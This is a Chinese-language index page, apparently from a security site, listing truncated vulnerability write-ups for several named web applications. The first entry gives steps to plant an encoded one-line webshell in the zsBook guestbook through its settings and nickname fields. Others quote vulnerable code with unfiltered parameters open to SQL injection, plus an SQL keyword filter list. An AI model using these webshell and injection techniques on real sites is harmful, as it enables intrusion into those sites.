-
智思留言本(zsBook v3.2.1)漏洞
后台-->留言本系统设置-->版权声明添加:┼攠數畣整爠煥敵瑳∨∫┩愾┼砧(一句话的UNICODE)然后在主页留言:注意:开始随便多留几条言,然后在昵称插入:┠砾此时,就可以在默认的数据中插入一句话默认数据库:da...
-
校无忧学校网站系统漏洞
很简单的漏洞id=request.QueryString("id")if id<>"" thenConn.execute("update News set num=num+1 w...
-
PHP 5.x COM functions提权漏洞
PHP是英文“超级文本预处理语言”(Hypertext Preprocessor)的缩写,是一种HTML内嵌式的语言。它可以比CGI或者Perl更快速地执行动态网页。PHP具有非常强大的功能,所有的 CGI或者Jav...
-
阿西网站推广系统注入漏洞
POST数据未过滤:if($post==\"post\") {$dizhi=$_POST[\'dizhi\'];$youbian = $_POST[\'youbian\'];$qq = $_POST[\'qq\'];$d...
-
智有道专业旅游系统漏洞
'\inc\incsql.asp<%dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Postsql_leach = "',and,exec,insert,select,delet...
